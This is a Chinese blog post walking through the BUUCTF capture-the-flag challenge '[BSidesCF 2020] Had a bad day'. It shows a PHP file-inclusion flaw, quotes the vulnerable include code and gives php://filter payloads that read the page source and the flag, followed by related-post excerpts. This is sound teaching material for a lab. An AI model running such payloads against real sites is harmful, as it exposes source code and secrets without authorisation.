[BSidesCF 2020]Had a bad day

已于 2024-01-23 16:12:42 修改
阅读量1.6w 收藏 10
点赞数 6
文章标签: android
于 2024-01-23 16:03:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74806534/article/details/135774221
版权

先看url,发现可能有注入

http://655c742e-b427-485c-9e15-20a1e7ef1717.node5.buuoj.cn:81/index.php?category=woofers

试试能不能查看index.php直接?category=index.php不行,试试伪协议

image-20240123155428022

把.php去掉试试

image-20240123155516417

base64解码

image-20240123155617527

    <?php
                $file = $_GET['category'];
​
                if(isset($file))
                {
                    if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
                        include ($file . '.php');
                    }
                    else{
                        echo "Sorry, we currently only support woofers and meowers.";
                    }
                }
                ?>

说明参数要包含woofers、meowers、index

试试读取flag文件

?category=php://filter/convert.base64-encode/index/resource=flag

image-20240123155923139

base64解码

image-20240123160012789

小小邵同学
关注
  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
hada-p2
03-13
【标题】"hada-p2"可能是指一个项目或者软件的版本号,通常在软件开发中,"p2"可能是代表第二个主要版本或一个特定的迭代。在这个上下文中,我们推测"hada-p2"可能是一个基于C#语言的项目。 【描述】由于描述仅为...
HADA protocol-开源
04-28
《HADA协议——开源软件在序列比对中的应用》 HADA协议,全称为Hierarchical Annotation Dependent Alignment,是一种用于序列比对的高效且灵活的方法。这个协议的开源实现为生物信息学研究提供了强大的工具,使得...
BSidesCF2020 Had a bad day
Tajang的大千世界
04-11 159
打开靶机 点击了一下WOOFERS,发现url类似于文件包含 尝试包含index.php php://filter/read=convert.base64-encode/resource=index.php 的确存在文件包含,但报错了,应该是包含的文件不对,一番尝试后,发现应该去掉后缀,如下 php://filter/read=convert.base64-encode/resource=index 给了一串编码,使用base64解码 其中PHP源码为 <?php $file =
BUUCTF_[BSidesCF 2020]Had a bad day
m_de_g的博客
04-26 595
【代码】BUUCTF_[BSidesCF 2020]Had a bad day
BUUCTF [BSidesCF 2020] Had a bad day
Senimo
12-11 561
BUUCTF [BSidesCF 2020] Had a bad day 考点: php伪协议嵌套 启动环境: 其中包含两个按钮,选择猫和狗的图片: 此时的URL变为: http://xxx/index.php?category=meowers 其中包含有GET传参,尝试修改category传入的值,得到报错: 其中为include()函数报错,尝试获取index.php页面的源码:php://filter/read=convert.base64-encode/resource=index.php:
BUUCTF Web [BSidesCF 2020]Had a bad day1
网安小趴菜
09-20 942
BUUCTF Web [BSidesCF 2020]Had a bad day1
【BUUCTF】[BSidesCF 2020]Had a bad day
aoao331198的博客
04-24 776
注意到url中的参数category,以为是注入点,实际上输入其他的只会一个错误说明 用php伪协议读取文件 /index.php?category=php://filter/convert.base64-encode/resource=index 解密拿到代码 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || st.
BUUCTF:[BSidesCF 2020]Had a bad day
末初的CSDN博客
03-30 5419
BUUCTF:[BSidesCF 2020]Had a bad day 可能存在SQL注入或者文件包含,在我尝试读取index.php源码的时候出现了报错信息 的确是文件包含,但是有index.php却读取错误,报错显示无法打开流:操作失败在后面测试的时候,发现除掉后缀即可读取到源码 base64解码读取源码 <?php $file = $_GET['category']; ...
buuctf-[BSidesCF 2020]Had a bad day(小宇特详解)
小宇的web博客
02-16 4693
buuctf-[BSidesCF 2020]Had a bad day(小宇特详解) 先看一下题目 这里上面有注入点,这里怀疑是SQL注入 先尝试读取一下index.php 这里使用php伪协议 payload: php://filter:/convert.base64-encode/resource=index.php 存在文件包含漏洞,但是这里报错了,分析之后是无法打开流:操作失败 这里去除php后缀 payload php://filter/convert.base64-encode/reso
第四十八题——[BSidesCF 2020]Had a bad day
分享简单的安全技术
04-27 397
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,两个按钮,点击任意一个均出现一张照片,且URL参数提交相应的值 第二步:利用php:filter读取index.php发现出错 php://filter/convert.base64-encode/resource=index.php 第三步:去掉.php后缀名后成功获取到源码的base64值,解码后得到源码 <?php $file = $_GET['category']; if(isset(
buuctf-web-[BSidesCF 2020]Had a bad day
weixin_46079186的博客
07-11 273
题目地址 打开题目 随机点击一个按钮 看这样子是文件包含 尝试了很多,最后发现index 不能加.php 这样才可以读出源码 php://filter/read=convert.base64-encode/resource=index 解密一下,拿到关键代码 审计代码,包含的字符必须有 woofers或者meowers或index 其中一个 这边还使用了拼接 .php ,所以第一步那里只能写index <?php $file = $_GET['category']; if(isse
六年级英语上册 Unit 7 I had a bad day.第一课时教案 广东版开心.doc
10-13
小学教案
六年级英语上册 Unit 7 I had a bad day.第三课时教案 广东版开心.doc
10-13
小学教案
hada-p3
03-27
hada-p3
安卓sdk manager下载安装
最新发布
qq_27933251的博客
08-20 294
通过android sdk manager安装android sdk
RabbitMQ-消息队列之routing使用
龙哥·三年风水从2011年开始做IT工作,从ps画图到前端开发->后端开发->框架开发->业务架构设计及开发->业务需求整理、开发->技术经理->技术总监
08-17 414
RabbitMQ-消息队列之routing使用
2024-08-16升级记录:使用Android RecyclerView控件显示列表型信息
sig321的专栏
08-16 767
在页面上使用RecyclerView实现一个列表型信息展示: 步骤如下: 二、添加单行显示的item布局文件 layout_gnss_counrty_item.xml 三、逻辑实现代码 实体类: Adapter类和ViewHolder类: 调用: 注意:一定要设置:LinearLayoutManager layoutManager = new LinearLayoutManager(this); mRecyclerView.setLayoutManager(layoutMan
wordpress二次开发 在Woocommerce相关产品中显示产品变体的方法
withkai44的博客
08-15 353
在Woocommerce中,相关产品的展示是一个很好的促销策略。但有时候,你可能希望在这些相关产品中显示产品的不同变体,以提供更多选择给客户。这段代码首先初始化了一个新的WP_Query对象来获取每个相关产品的所有变体。然后,在循环内,你可以按需自定义显示这些变体的代码。这意味着它获取了当前产品的ID,并调用了与之相关的产品。要显示这些相关产品的变体,你需要对这部分代码进行修改。接下来,你需要一个循环来显示每个相关产品的变体。在这个文件中,你可以看到相关产品是如何被调用的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值